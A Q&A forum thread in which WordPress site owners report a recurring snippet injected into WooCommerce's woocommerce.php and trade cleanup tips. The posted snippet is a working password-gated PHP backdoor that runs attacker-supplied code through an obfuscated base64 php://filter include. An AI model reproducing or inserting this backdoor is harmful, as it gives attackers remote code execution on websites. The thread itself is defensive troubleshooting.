# Strange code being added to woocommerce.php file

Tags: wordpress, woocommerce, virus

I have found this strange code within the core woocommerce.php file.

Does anyone understand what this code is trying to do? I suspect it is malware as it is not part of the core WooCommerce code.

I am trying to understand if it is being added by a plugin and is legitimate or if it is some form of virus/malware etc.

```
if (isset($_POST["_aey8iousjrkdf"],$_POST['WP_6cdd22']) && sha1($_POST['WP_6cdd22']) == "6cdd22ad6267ba73cd92bf8abd7ec2058740fa80") { $_oxyu = tempnam(sys_get_temp_dir(),"rlgalfarg"); file_put_contents($_oxyu,$_POST["_aey8iousjrkdf"]); require_once "php".":"."//filt"."e"."r/c"."onvert."."ba"."s"."e"."64-"."d"."e"."code/co"."n"."v"."er"."t.b"."a"."s"."e64-de"."co"."de/"."resou"."rce"."=".$_oxyu; unlink($_oxyu); die(); }
```

Comment: It seems like malware.

Comment: Yes, it looks like malware. Please be sure, that all of yours plugins are up to date, and you don't use any NULLED version of plugins / theme.

Comment: Thanks for the comments, yes it looks like malware. We have deleted everything from the server, reuploaded clean Wordpress & plugins and the code has reappeared again. I'm now wondering if there is malware code embedded into the SQL file. I will post any updates on the situation to help anyone else who may see this code within the woocommerce.php file.

Comment: I am seeing exactly the same code being injected into woocommerce.php. I delete it and it immediately reappears. Can't work out where it's coming from.

Comment: @DavidSmith did you manage to find a solution to this problem?

Comment: @AndyJones Unfortunately not. We've managed to block it from reoccurring for now, although I would obviously prefer top find the cause and remove it. To block it we have made sure 'define( 'DISALLOW_FILE_EDIT', true );' is in the wp-config.php file and just in case, we have also added // to the very end of woocommerce.php so it will comment out the code if it reappears. Not a solution, just a temporary band aid.

Answer (score 0):

Had same problemm with this woocommerce.php. After removing code it just returning straight back. After researching and playing around I think I've found the way.
I have added /* just before "if" and all code turned into just a comment. Now second day and nothing new returning to the place.
Of course this is not the best way to do it and I'm not sure if it will stay as a comment but so far seems to be ok.
If somebody can find full removal way please share with us here.

Comment: So far we have not had the code come back after 29 days. The solution for us was to backup everything locally, then delete all files from the server, re-upload a clean version of WordPress using the same MySQL database, and re-install clean versions of each plugin and a clean version of the theme. We then checked the uploads folder for files and extensions that should not be there and uploaded the folder to the server. Just to make sure we added // to the end of the woocommerce.php file and checked the file daily. So far it has not come back, the malware had obviously buried itself in a file.

Comment: Just make sure you back up everything in case you lose something. But do not be tempted to reupload any of your backup files without checking them thoroughly first.

Comment: Please post commenst for suggestions and write self contained answer.